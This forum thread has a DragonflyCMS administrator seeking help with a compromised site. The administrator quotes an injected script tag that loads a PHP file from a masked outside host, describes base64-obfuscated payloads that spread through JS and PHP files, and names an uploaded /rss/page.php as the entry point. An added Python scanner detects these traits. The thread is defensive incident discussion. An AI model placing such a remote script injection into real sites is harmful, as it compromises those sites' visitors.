
Code Insertion Between Head and Body Tags


On one of the websites that I administer, I have a code injection between the head and body tags. I have searched the source code, but I have yet to figure out where the culprit is hiding.
</head><script src=http://xxx.xxx/piudurres/indexu.php ></script> <body>

Any help would be greatly appreciated.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/Apache2/MySQL5.0.14/PHP5.2.6/DF9.2.1


/themes/*/template/index.php
If you can't find it, clear the /cache/

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


Themes/yourtheme/template/header.html

cache folder. Check your cache folder permissions.

www.greenday2k.net



I eventually found it; however, most of it was base64 encoded. It took over almost all JavaScript files and many PHP files, including config.php.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/Apache2/MySQL5.0.14/PHP5.2.6/DF9.2.1
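
A defensive sweep for the two traits described in the posts above (a script element between `</head>` and `<body>`, and base64-encoded payloads in JavaScript and PHP files), as an added example that is not part of the original thread. The regexes, the 24-character threshold, the marker list and the scanned extensions are assumptions; it goes beyond the posts by decoding quoted base64 literals to show what they hide.

```python
import base64
import re
from pathlib import Path

# Any <script> between </head> and <body>, as in the snippet from the first post.
HEAD_BODY_SCRIPT = re.compile(r"</head\s*>(?:(?!<body\b).)*?<script\b", re.I | re.S)
# Quoted base64-looking literals; the 24-character minimum is an assumption.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{24,}={0,2})["']""")
# Content that makes a decoded literal worth reporting (assumed marker list).
DECODED_MARKERS = re.compile(rb"<script\b|document\.write|eval\s*\(", re.I)
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}


def decode_suspicious(text):
    """Return decoded base64 literals that contain script-like markers."""
    hits = []
    for match in B64_LITERAL.finditer(text):
        blob = match.group(1).rstrip("=")
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:  # not valid base64 after all
            continue
        if DECODED_MARKERS.search(decoded):
            hits.append(decoded.decode("latin-1"))
    return hits


def scan_file(path):
    """Return human-readable findings for one file (empty list if clean)."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    findings = []
    if HEAD_BODY_SCRIPT.search(text):
        findings.append("script element between </head> and <body>")
    findings += ["base64 literal decodes to: " + d[:80] for d in decode_suspicious(text)]
    return findings


def scan_tree(root):
    """Map each flagged file under root (relative path) to its findings."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            findings = scan_file(path)
            if findings:
                report[path.relative_to(root).as_posix()] = findings
    return report
```

`scan_tree` takes the path of a web root, ideally an offline copy, and returns a dict mapping relative file paths to their findings.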


I am still working on trying to figure out how it got in. I have had the one site for about 2 years with no problems and all of a sudden I have two sites both attacked almost concurrently. There have been no changes on hosting or configuration. The first site was infected by an upload of /rss/page.php.



jcjordan, most likely the attack was done from within the server ... however, which files did they modify? Asking because I'm working on a few solutions against those kinds of attacks, and an extensive list of modified files would really help.

Both sites attacked at the same time? Must be done from within the server; is it a shared server?

.:: I met php the 03 December 2003 :: Unforgettable day! ::.



I have a list of most of the files that they modified and what I think is the original culprit. If you would like, I can send the list and file to you.

Yes, it is a shared server and I have the security team checking into it now.

It was not simultaneous, but it did happen very quickly. I ended up having to kill the site completely, verify that the files were clean and then re-up.



PM sent

.:: I met php the 03 December 2003 :: Unforgettable day! ::.



Email sent. I sent you the logs, the list of files changed over different domains, and the catalyst file called /rss/page.php.



Never received your email :), please send it again.

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

